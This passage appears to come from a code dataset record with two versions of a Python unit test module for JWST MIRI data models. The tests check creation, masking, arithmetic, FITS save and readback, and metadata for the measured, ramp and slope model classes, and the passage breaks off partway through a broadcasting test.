self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriRampModel(unittest.TestCase):\n\n def setUp(self):\n self.a1 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n self.c1 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.c2 = [[0, 1, 1, 0], [1, 
0, 0, 1], [1, 0, 1, 0]]\n self.acube = [self.a1, self.a1, self.a1]\n self.ccube = [self.c1, self.c2, self.c1]\n self.ahyper = [self.acube, self.acube]\n self.chyper = [self.ccube, self.ccube]\n self.refout = np.ones_like(self.chyper)\n self.dataproduct = MiriRampModel(data=self.ahyper, refout=self.\n refout, pixeldq=self.c1, dq_def=pixeldq_flags, groupdq=self.\n chyper, groupdq_def=groupdq_flags)\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIFULONG',\n channel='1', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='FAST', nints=1,\n ngroups=1, frame_time=1.0, integration_time=10.0, group_time=\n 10.0, reset_time=0, frame_resets=3)\n self.testfile = 'MiriRampModel_test.fits'\n\n def tearDown(self):\n del self.a1, self.c1, self.c2\n del self.acube, self.ccube\n del self.ahyper, self.chyper\n del self.dataproduct\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + self.testfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n\n def test_creation(self):\n b1 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n bcube = [b1, b1, b1]\n bhyper = [bcube, bcube]\n newdp1 = MiriRampModel(data=self.ahyper)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.pixeldq)\n self.assertTrue(newdp1.pixeldq.ndim == 2)\n self.assertIsNotNone(newdp1.groupdq)\n self.assertTrue(newdp1.groupdq.ndim == 4)\n self.assertEqual(np.mean(newdp1.groupdq), 0)\n descr1 = str(newdp1)\n del newdp1, descr1\n newdp3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.pixeldq)\n 
self.assertTrue(newdp3.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp3.pixeldq), 0)\n self.assertIsNotNone(newdp3.groupdq)\n self.assertTrue(newdp3.groupdq.ndim == 4)\n self.assertNotEqual(np.mean(newdp3.groupdq), 0)\n descr3 = str(newdp3)\n del newdp3, descr3\n newdp4 = MiriRampModel(data=self.ahyper, pixeldq=self.c1)\n self.assertIsNotNone(newdp4.data)\n self.assertGreater(len(newdp4.data), 0)\n self.assertIsNotNone(newdp4.pixeldq)\n self.assertTrue(newdp4.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp4.pixeldq), 0)\n self.assertIsNotNone(newdp4.groupdq)\n self.assertTrue(newdp4.groupdq.ndim == 4)\n descr4 = str(newdp4)\n del newdp4, descr4\n newdp5 = MiriRampModel(data=self.ahyper, groupdq=self.chyper)\n self.assertIsNotNone(newdp5.data)\n self.assertGreater(len(newdp5.data), 0)\n self.assertIsNotNone(newdp5.pixeldq)\n self.assertTrue(newdp5.pixeldq.ndim == 2)\n self.assertIsNotNone(newdp5.groupdq)\n self.assertTrue(newdp5.groupdq.ndim == 4)\n self.assertNotEqual(np.mean(newdp5.groupdq), 0)\n descr5 = str(newdp5)\n del newdp5, descr5\n emptydp = MiriRampModel((2, 2, 2, 2))\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (2, 2, 2, 2))\n self.assertIsNotNone(emptydp.pixeldq)\n self.assertIsNotNone(emptydp.groupdq)\n self.assertEqual(emptydp.groupdq.shape, (2, 2, 2, 2))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n nulldp = MiriRampModel()\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(self.ahyper)\n self.assertIsNotNone(nulldp.pixeldq)\n self.assertIsNotNone(nulldp.groupdq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n a1d = [10, 20, 30, 40]\n c1d = [1, 0, 0, 0]\n self.assertRaises(ValueError, MiriRampModel, data=a1d, pixeldq=c1d)\n a2d = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n c2d = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.assertRaises(ValueError, MiriRampModel, data=a2d, groupdq=c2d)\n a3d 
= [a2d, a2d, a2d]\n c3d = [c2d, c2d, c2d]\n self.assertRaises(ValueError, MiriRampModel, data=a3d, pixeldq=c3d)\n self.assertRaises(ValueError, MiriRampModel, data=a3d, groupdq=c3d)\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n pixeldq=self.ccube)\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n groupdq=self.c1)\n\n def test_masking(self):\n self.assertIsNotNone(self.dataproduct.dq)\n mask1 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='pixeldq')\n self.assertIsNotNone(mask1.pixeldq)\n self.assertGreater(len(mask1.pixeldq), 0)\n self.assertIsNotNone(mask1.dq)\n self.assertGreater(len(mask1.dq), 0)\n self.assertEqual(mask1.dq.shape, mask1.pixeldq.shape)\n self.assertTrue(np.all(mask1.dq == mask1.pixeldq))\n del mask1\n mask2 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='groupdq')\n self.assertIsNotNone(mask2.groupdq)\n self.assertGreater(len(mask2.groupdq), 0)\n self.assertIsNotNone(mask2.dq)\n self.assertGreater(len(mask2.dq), 0)\n self.assertEqual(mask2.dq.shape, mask2.groupdq.shape)\n self.assertTrue(np.all(mask2.dq == mask2.groupdq))\n del mask2\n mask3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='both')\n self.assertIsNotNone(mask3.pixeldq)\n self.assertGreater(len(mask3.pixeldq), 0)\n self.assertIsNotNone(mask3.groupdq)\n self.assertGreater(len(mask3.groupdq), 0)\n self.assertIsNotNone(mask3.dq)\n self.assertGreater(len(mask3.dq), 0)\n self.assertEqual(mask3.dq.shape, mask3.groupdq.shape)\n expected = mask3.groupdq | mask3.pixeldq\n self.assertTrue(np.all(mask3.dq == expected))\n del mask3\n\n def test_arithmetic(self):\n testdp = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='both')\n descr = str(testdp)\n self.assertIsNotNone(descr)\n del descr\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n double = testdp * 2.0\n 
self.assertIsNotNone(double.data)\n self.assertGreater(len(double.data), 0)\n expected = double.data * 2.0\n self.assertTrue(np.all(double.data - expected < 0.001))\n descr = str(double)\n self.assertIsNotNone(descr)\n del descr\n warnings.simplefilter('ignore')\n result = self.dataproduct + testdp\n self.assertIsNotNone(result.data)\n self.assertGreater(len(result.data), 0)\n self.assertIsNotNone(result.dq)\n self.assertGreater(len(result.dq), 0)\n descr = str(result)\n self.assertIsNotNone(descr)\n del descr\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriRampModel(self.testfile) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'refout', 'pixeldq', 'groupdq'], tables\n =['pixeldq_def', 'groupdq_def'])\n del readback\n\n def test_description(self):\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.refout)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriSlopeModel(unittest.TestCase):\n\n def setUp(self):\n a1 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n b1 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c1 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n acube = [a1, a1, a1]\n bcube = [b1, b1, b1]\n ccube = [c1, c1, c1]\n dcube = [a1, b1, a1]\n self.dataproduct = MiriSlopeModel(data=acube, err=bcube, dq=ccube,\n dq_def=master_flags, zeropt=dcube, fiterr=dcube)\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 
0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIMAGE', filt=\n 'F2550W', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='SLOW', nints=3,\n ngroups=10, frame_time=1.0, integration_time=100.0, group_time=\n 1000.0, reset_time=0, frame_resets=3)\n self.testfile = 'MiriSlopeModel_test.fits'\n\n def tearDown(self):\n del self.dataproduct\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + self.testfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n\n def test_creation(self):\n a1d = [10, 20, 30, 40]\n b1d = [1, 2, 3, 4]\n c1d = [1, 0, 0, 0]\n self.assertRaises(ValueError, MiriSlopeModel, data=a1d, err=b1d, dq=c1d\n )\n a2d = [a1d, a1d, a1d]\n b2d = [b1d, b1d, b1d]\n c2d = [c1d, c1d, c1d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a2d, err=b2d, dq=c2d\n )\n a3d = [a2d, a2d]\n b3d = [b2d, b2d]\n c3d = [c2d, c2d]\n a4d = [a3d, a3d]\n b4d = [b3d, b3d]\n c4d = [c3d, c3d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a4d, err=b4d, dq=c4d\n )\n\n def test_copy(self):\n datacopy = self.dataproduct.copy()\n self.assertIsNotNone(datacopy)\n assert_products_equal(self, self.dataproduct, datacopy, arrays=[\n 'data', 'err', 'dq', 'nreads', 'readsat', 'ngoodseg', 'zeropt',\n 'fiterr'], tables='dq_def')\n del datacopy\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriSlopeModel(self.testfile) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq', 'nreads', 'readsat',\n 'ngoodseg', 'zeropt', 'fiterr'], tables='dq_def')\n del readback\n\n def test_description(self):\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = 
self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\"\"\"\n\nModule test_measured_model - Contains the unit tests for the classes\nin the datamodels.miri_measured_model module.\n\n:History:\n\n15 Jan 2013: Created.\n21 Jan 2013: Warning messages controlled with Python warnings module.\n05 Feb 2013: File closing problem solved by using \"with\" context manager.\n08 Feb 2013: Replaced 'to_fits' with more generic 'save' method.\n23 Apr 2013: Modified to keep up with behaviour of jwst_lib model.\n Uninitialised arrays now have the same size and shape as the\n data array but are full of default values.\n26 Apr 2013: File closing problem has returned!\n13 May 2013: Added MiriSlopeModel to describe MIRI slope data\n (which is different from \"ImageModel\" data because it\n preserves integrations). N.B. FINAL MODEL IS TBD.\n04 Jun 2013: Shortened the names of the ramp, slope and image models.\n10 Jun 2013: Added more metadata tests.\n02 Jul 2013: MiriCubeModel added.\n29 Jul 2013: stats() method added.\n14 Aug 2013: Updated ramp model test to include groupdq and pixeldq\n02 Sep 2013: Compare numpy record arrays in a way that it independent\n of the byte ordering.\n12 Sep 2013: Swapped the MRS CHANNEL and BAND keywords.\n12 Sep 2013: Test that the data product can be copied successfully.\n04 Oct 2013: Changed default field_def table to use MIRI reserved flags.\n07 Oct 2013: GROUP_DEF table added to MIRI ramp data. Test MiriRampModel\n for masking and arithmetic operations.\n24 Feb 2014: Instrument name (INSTRUME) changed from meta.instrument.type to\n meta.instrument.name.\n27 Feb 2014: Added extra data arrays to MiriSlopeModel test.\n04 Mar 2014: Added set_housekeeping_metadata.\n25 Jun 2014: field_def and group_def changed to dq_def and groupdq_def.\n field_def for ramp data changed to pixeldq_def.\n21 Jul 2014: IM, and LW detectors changed to MIRIMAGE and MIRIFULONG.\n25 Sep 2014: Updated the reference flags. 
insert_value_column function\n used to convert between 3 column and 4 column flag tables.\n TYPE and REFTYPE are no longer identical.\n07 Nov 2014: The data model now raises an IOError when an invalid file\n path is provided.\n11 Mar 2015: group_integration_time changed to group_time.\n11 Jun 2015: Added a history record test.\n09 Jul 2015: Reference output array (refout) added to MiriRampModel schema.\n19 Aug 2015: Removed MiriImageModel and MiriCubeModel.\n07 Oct 2015: Made exception catching Python 3 compatible.\n08 Apr 2016: Removed obsolete FIXME statements.\n04 May 2016: ERR array removed from ramp data model.\n31 Aug 2016: Change exception detected when creating a data model with an\n invalid initialiser.\n15 Jun 2017: Observation and target metadata is appropriate for ramp and\n slope data only.\n12 Jul 2017: Replaced \"clobber\" parameter with \"overwrite\".\n13 Sep 2017: Updated \"not a file name\" test to match the new behaviour of\n JWST pipeline version 0.7.8rc2\n27 Apr 2018: Corrected bug in get_history() length test.\n27 Jun 2018: Removed unused arrays.\n15 Feb 2018: Check that the DQ_DEF table has the correct fieldnames.\n\n@author: Steven Beard (UKATC)\n\n\"\"\"\n\nimport os\nimport unittest\nimport warnings\n\nimport numpy as np\n\n# Import the JWST master data quality flag definitions\nfrom miri.datamodels.dqflags import master_flags, pixeldq_flags, \\\n groupdq_flags\n\nfrom miri.datamodels.miri_measured_model import MiriMeasuredModel, \\\n MiriRampModel, MiriSlopeModel\nfrom miri.datamodels.tests.util import assert_recarray_equal, \\\n assert_products_equal\n\n\nclass TestMiriMeasuredModel(unittest.TestCase):\n \n # Test the MiriMeasuredModel class\n\n def setUp(self):\n # Create a 64x64 simple MiriMeasuredModel object, with no error\n # or quality arrays.\n self.data = np.linspace(0.0, 100000.0, 64*64)\n self.data.shape = [64,64]\n self.simpleproduct = MiriMeasuredModel(data=self.data)\n # Add some example metadata.\n 
self.simpleproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.simpleproduct.set_instrument_metadata(detector='MIRIMAGE',\n filt='F560W',\n ccc_pos='OPEN',\n deck_temperature=10.0,\n detector_temperature=7.0)\n self.simpleproduct.set_exposure_metadata(readpatt='SLOW',\n nints=1, ngroups=10,\n frame_time=30.0,\n integration_time=30.0,\n group_time=300.0,\n reset_time=0, frame_resets=3)\n \n # Create a more complex MiriMeasuredModel object from primary,\n # error and quality arrays.\n self.primary = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]\n self.error = [[1,2,3,4], [5,6,7,8], [9,10,11,12]]\n self.quality = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]\n self.dataproduct = MiriMeasuredModel(data=self.primary,\n err=self.error,\n dq=self.quality,\n dq_def=master_flags)\n # Add some example metadata.\n self.dataproduct.set_instrument_metadata(detector='MIRIFUSHORT',\n channel='1',\n ccc_pos='OPEN',\n deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='FAST',\n nints=1, ngroups=1,\n frame_time=1.0,\n integration_time=10.0,\n group_time=10.0,\n reset_time=0, frame_resets=3)\n\n self.testfile1 = \"MiriMeasuredModel_test1.fits\"\n self.testfile2 = \"MiriMeasuredModel_test2.fits\"\n self.tempfiles = [self.testfile1, self.testfile2]\n \n def tearDown(self):\n # Tidy up\n del self.dataproduct\n del self.primary, self.error, self.quality\n del self.simpleproduct\n del self.data\n # Remove temporary files, if they exist and if able to.\n for tempfile in self.tempfiles: \n if os.path.isfile(tempfile):\n try:\n os.remove(tempfile)\n except Exception as e:\n strg = \"Could not remove temporary file, \" + tempfile + \\\n \"\\n \" + str(e)\n warnings.warn(strg)\n del self.tempfiles\n \n def test_creation(self):\n # Check that the DQ_DEF field names in the class variable are the same\n # as the ones declared in the schema.\n dq_def_names = list(MiriMeasuredModel.dq_def_names)\n schema_names = 
list(self.dataproduct.get_field_names('dq_def'))\n self.assertEqual(dq_def_names, schema_names,\n \"'dq_def_names' class variable does not match schema\")\n\n # Test that the error and quality arrays are optional.\n a2 = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]\n b2 = [[1,2,3,4], [5,6,7,8], [9,10,11,12]]\n c2 = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]\n \n # 1) Data array only. Data array must exist and be non-empty.\n # Other arrays should exist and be the same size and shape as the\n # data array. They should be full of default values.\n newdp1 = MiriMeasuredModel(data=a2)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.err)\n self.assertEqual(newdp1.err.shape, newdp1.data.shape)\n # Assumes default is 0.0 - see schema\n self.assertAlmostEqual(np.mean(newdp1.err), 0.0)\n self.assertIsNotNone(newdp1.dq)\n self.assertEqual(newdp1.dq.shape, newdp1.dq.shape)\n # Assumes default is 0 - see schema\n self.assertEqual(np.mean(newdp1.dq), 0)\n descr1 = str(newdp1)\n self.assertIsNotNone(descr1)\n del newdp1, descr1\n \n # 2) Data and error arrays only. Data and error arrays must exist\n # and be non-empty. Quality array should exist but be the same\n # size and shape as the data array. It should be full of default\n # values.\n newdp2 = MiriMeasuredModel(data=a2, err=b2)\n self.assertIsNotNone(newdp2.data)\n self.assertGreater(len(newdp2.data), 0)\n self.assertIsNotNone(newdp2.err)\n self.assertEqual(newdp2.err.shape, newdp2.data.shape)\n # The error array must not be full of default values.\n self.assertNotAlmostEqual(np.mean(newdp2.err), 0.0)\n self.assertIsNotNone(newdp2.dq)\n self.assertEqual(newdp2.dq.shape, newdp2.dq.shape)\n # Assumes default is 0 - see schema\n self.assertEqual(np.mean(newdp2.dq), 0)\n descr2 = str(newdp2)\n self.assertIsNotNone(descr2)\n del newdp2, descr2\n\n # 3) Data, error and quality arrays. 
All arrays must exist,\n # be non-empty and be the same size and shape.\n newdp3 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.err)\n self.assertEqual(newdp3.err.shape, newdp3.data.shape)\n # The error array must not be full of default values.\n self.assertNotAlmostEqual(np.mean(newdp3.err), 0.0)\n self.assertIsNotNone(newdp3.dq)\n self.assertEqual(newdp3.dq.shape, newdp3.dq.shape)\n # The quality array must not be full of default values.\n self.assertNotEqual(np.mean(newdp3.dq), 0)\n descr3 = str(newdp3)\n self.assertIsNotNone(descr3)\n del newdp3, descr3\n \n # It should be possible to set up an empty data product with\n # a specified shape. All three arrays should be initialised to\n # the same shape.\n emptydp = MiriMeasuredModel( (4,4) )\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (4,4))\n self.assertIsNotNone(emptydp.err)\n self.assertEqual(emptydp.err.shape, (4,4))\n self.assertIsNotNone(emptydp.dq)\n self.assertEqual(emptydp.dq.shape, (4,4))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n \n # A null data product can also be created and populated\n # with data later.\n nulldp = MiriMeasuredModel( )\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(a2)\n self.assertIsNotNone(nulldp.err)\n self.assertIsNotNone(nulldp.dq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n \n # A scalar data product is possible, even if of little use.\n scalardp = MiriMeasuredModel( data=42 )\n self.assertEqual(scalardp.data, 42)\n self.assertIsNotNone(scalardp.err)\n self.assertIsNotNone(scalardp.dq)\n descr = str(scalardp)\n self.assertIsNotNone(descr)\n del scalardp, descr\n \n # Attempts to create a data product from invalid data types\n # and stupid values must be detected.\n # NOTE: A bug in the JWST data model might cause an AttributeError\n # 
to be raised instead of a ValueError. If this happens, try a newer\n # version of the JWST data model library.\n self.assertRaises(ValueError, MiriMeasuredModel, init=[])\n self.assertRaises(ValueError, MiriMeasuredModel, init=42)\n self.assertRaises(ValueError, MiriMeasuredModel, init='not a file name')\n self.assertRaises(IOError, MiriMeasuredModel, init='nosuchfile.fits')\n #self.assertRaises(ValueError, MiriMeasuredModel, init='')\n self.assertRaises(ValueError, MiriMeasuredModel, data='badstring')\n\n def test_metadata(self):\n # Check the dataproducts contain metadata\n # First test the basic STScI FITS keyword lookup method.\n kwstrg = self.simpleproduct.find_fits_keyword('TELESCOP',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n # kwstrg is a list - assume the first entry is what we want.\n telname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(telname, 'JWST')\n # Accessing the tree structure directly should also work.\n telname = self.simpleproduct.meta.telescope\n self.assertEqual(telname, 'JWST')\n # An alternative lookup provided by the MIRI data model.\n telname = self.simpleproduct.get_fits_keyword('TELESCOP')\n self.assertEqual(telname, 'JWST')\n \n kwstrg = self.simpleproduct.find_fits_keyword('INSTRUME',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n insname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.meta.instrument.name\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.get_fits_keyword('INSTRUME')\n self.assertEqual(insname, 'MIRI')\n \n # Add some history records and check they exist.\n self.simpleproduct.add_history('History 1')\n self.simpleproduct.add_history('History 2')\n self.simpleproduct.add_history('History 3')\n self.assertGreaterEqual(len(self.simpleproduct.get_history()), 3)\n strg = self.simpleproduct.get_history_str()\n self.assertIsNotNone(strg)\n self.assertGreater(len(strg), 0)\n \n def test_content(self):\n # The data, err and dq 
attributes are aliases for the primary,\n # error and quality arrays\n self.assertTrue( np.allclose(self.primary, self.dataproduct.data) )\n self.assertTrue( np.allclose(self.error, self.dataproduct.err) )\n self.assertTrue( np.allclose(self.quality, self.dataproduct.dq) )\n\n def test_copy(self):\n # Test that a copy can be made of the data product.\n datacopy = self.dataproduct.copy()\n self.assertIsNotNone(datacopy)\n assert_products_equal( self, self.dataproduct, datacopy,\n arrays=['data', 'err', 'dq'],\n tables='dq_def' )\n del datacopy\n\n def test_fitsio(self):\n # Suppress metadata warnings\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n \n # Check that the data products can be written to a FITS\n # file and read back again without changing the data.\n self.simpleproduct.save(self.testfile1, overwrite=True)\n with MiriMeasuredModel(self.testfile1) as readback:\n self.assertTrue( np.allclose(self.simpleproduct.data,\n readback.data) )\n del readback\n\n self.dataproduct.save(self.testfile2, overwrite=True)\n with MiriMeasuredModel(self.testfile2) as readback:\n assert_products_equal( self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq'],\n tables='dq_def' )\n del readback\n\n def test_asciiio(self):\n # Check that the data products can be written to an ASCII\n # file and read back again without changing the data.\n # TODO: At the moment jwst_lib only supports FITS I/O\n pass\n# # Suppress metadata warnings\n# with warnings.catch_warnings():\n# warnings.simplefilter(\"ignore\")\n# self.simpleproduct.save(self.testfile_ascii, overwrite=True)\n# with MiriMeasuredModel(self.testfile_ascii) as readback:\n# self.assertTrue( np.allclose(self.simpleproduct.data,\n# readback.data) )\n# del readback\n\n def test_masking(self):\n # The DQ array must mask off bad values in the SCI and ERR arrays.\n a2 = [[10,999,10,999], [999,10,10,999], [10,10,999,10]]\n b2 = [[1,99,1,99], [99,1,1,99], [1,1,99,1]]\n c2 = [[0,1,0,1], [1,0,0,1], 
[0,0,1,0]]\n\n # Without a DQ array (assuming the default quality value is 0)\n # the SCI and ERR arrays are not masked, so their averages\n # include the 999s and are greater than they ought to be.\n newdp = MiriMeasuredModel(data=a2, err=b2)\n meandata = np.mean(newdp.data_masked)\n self.assertGreater(meandata, 10)\n meanerr = np.mean(newdp.err_masked)\n self.assertGreater(meanerr, 1)\n \n # The addition of the quality data should cause the SCI and ERR\n # arrays to be masked off and give the correct average.\n newdp2 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n meandata2 = np.mean(newdp2.data_masked)\n self.assertAlmostEqual(meandata2, 10)\n meanerr2 = np.mean(newdp2.err_masked)\n self.assertAlmostEqual(meanerr2, 1)\n \n del newdp, newdp2\n\n def test_arithmetic(self):\n a2 = [[90,80,70,60],[50,40,30,20],[10,0,-10,-20]]\n b2 = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]\n c2 = [[0,1,1,0],[0,2,0,2],[1,0,1,0]]\n newdp = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n \n # Self-subtraction of the simple product. 
The result\n # should be zero.\n newsimple = self.simpleproduct - self.simpleproduct\n self.assertAlmostEqual(newsimple.data.all(), 0.0)\n del newsimple\n \n # Scalar addition\n result = self.dataproduct + 42\n test1 = self.dataproduct.data + 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n\n # Data product addition\n result = self.dataproduct + newdp\n test1 = self.dataproduct.data + newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n # Test that error arrays are combined properly - at least for\n # a couple of unmasked points.\n expectedsq = self.error[1][0]*self.error[1][0] + b2[1][0]*b2[1][0]\n actualsq = result.err[1,0]*result.err[1,0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1]*self.error[2][1] + b2[2][1]*b2[2][1]\n actualsq = result.err[2,1]*result.err[2,1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n \n # Scalar subtraction\n result = self.dataproduct - 42\n test1 = self.dataproduct.data - 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n\n # Data product subtraction\n result = self.dataproduct - newdp\n test1 = self.dataproduct.data - newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n # Test that error arrays are combined properly - at least for\n # a couple of unmasked points.\n expectedsq = self.error[1][0]*self.error[1][0] + b2[1][0]*b2[1][0]\n actualsq = result.err[1,0]*result.err[1,0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1]*self.error[2][1] + b2[2][1]*b2[2][1]\n actualsq = result.err[2,1]*result.err[2,1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n \n # Addition and subtraction should cancel each other out\n result = self.dataproduct + newdp - newdp\n test1 = self.dataproduct.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n \n # Scalar multiplication\n result = self.dataproduct * 
3\n test1 = self.dataproduct.data * 3\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n\n # Data product multiplication\n result = self.dataproduct * newdp\n test1 = self.dataproduct.data * newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n err1 = self.dataproduct.err\n da1 = self.dataproduct.data\n err2 = newdp.err\n da2 = newdp.data\n expectedErr = np.sqrt(err1 * err1 * da2 * da2 + err2 * err2 * da1 * da1)\n self.assertTrue(np.array_equal(expectedErr, result.err))\n \n del result, da1, da2, err1, err2, expectedErr\n\n # Scalar division\n result = self.dataproduct / 3.0\n test1 = self.dataproduct.data / 3.0\n test2 = result.data\n self.assertAlmostEqual(test1.all(), test2.all())\n del test1, test2, result\n \n # Division by zero\n self.assertRaises(ValueError, self.dataproduct.__truediv__, 0.0)\n\n # Data product division\n #print(\"NOTE: The following test is expected to generate run time warnings.\")\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n result = self.dataproduct / newdp\n test1 = self.dataproduct.data / newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n # Test Juergen Schreiber error propagation\n dat = self.dataproduct.data[1][1]\n newdat = newdp.data[1][1]\n resultErr = result.err[1][1]\n dpErr = self.dataproduct.err[1][1]\n newdpErr = newdp.err[1][1]\n expectErr = np.sqrt( dpErr * dpErr/(newdat * newdat) + \\\n newdpErr * newdpErr * dat * dat / \\\n (newdat * newdat * newdat * newdat)) \n \n self.assertEqual(expectErr, resultErr)\n del test1, test2, result\n \n # More complex arithmetic should be possible.\n newdp2 = newdp * 2\n newdp3 = newdp * 3\n newdp4 = newdp2 + newdp3\n result = ((self.dataproduct - newdp) * newdp2 / newdp3) + newdp4\n del newdp, newdp2, newdp3, newdp4\n del result\n\n def test_broadcasting(self):\n # Test that operations where the broadcasting of one array\n # onto a similar shaped array work.\n a4x3 = 
